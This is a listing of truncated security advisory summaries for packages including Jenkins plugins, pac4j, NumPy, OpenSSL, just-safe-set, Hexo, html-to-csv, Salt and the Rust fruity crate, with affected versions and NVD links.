A cross-site request forgery (CSRF) vulnerability in Jenkins Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method,…
[org.jenkins-ci.plugins:ssh-agent] Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs
Missing permission checks in Jenkins SSH Agent Plugin 1.23 and earlier allow attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 requires the app…
[org.pac4j:pac4j-core] Pac4j token validation bypass if OpenID Connect provider supports none algorithm
If an OpenID Connect provider supports the “none” algorithm (i.e., tokens with no signature), pac4j v5.3.0 (and prior) does not refuse it without an explicit configuration on its side or for the “idtoken” response type which is not secure and violates …
[numpy] Incorrect Comparison in NumPy
Incomplete string comparison in the numpy.core component in NumPy1.9.x, which allows attackers to fail the APIs via constructing specific string objects.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-34141
https://github.com/numpy/numpy/issues/…
[openssl-src] Invalid handling of `X509_verify_cert()` internal errors in libssl
Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return va…
[just-safe-set] Prototype polluation in just-safe-set
Prototype pollution vulnerability in ‘just-safe-set’ versions 1.0.0 through 2.2.1 allows an attacker to cause a denial of service and may lead to remote code execution.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-25952
https://github.com/angu…
[hexo] XSS in Hexo
Hexo versions 0.0.1 to 5.4.0 are vulnerable against stored XSS. The post “body” and “tags” don’t sanitize malicious javascript during web page generation. Local unprivileged attacker can inject arbitrary code.
References
https://nvd.nist.gov/vuln/deta…
[html-to-csv] Improper Neutralization of Formula Elements in a CSV File in html-2-csv
This affects all versions of package html-to-csv. When there is a formula embedded in a HTML page, it gets accepted without any validation and the same would be pushed while converting it into a CSV file. Through this a malicious actor can embed or gen…
[salt] Exposure of Resource to Wrong Sphere in salt
An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-21996
https://lists.deb…
[fruity] Improper Input Validation in fruity
An issue was discovered in the fruity crate through 0.2.0 for Rust. Security-relevant validation of filename extensions is plausibly affected. Methods of NSString for conversion to a string may return a partial result. Because they call CStr::from_ptr …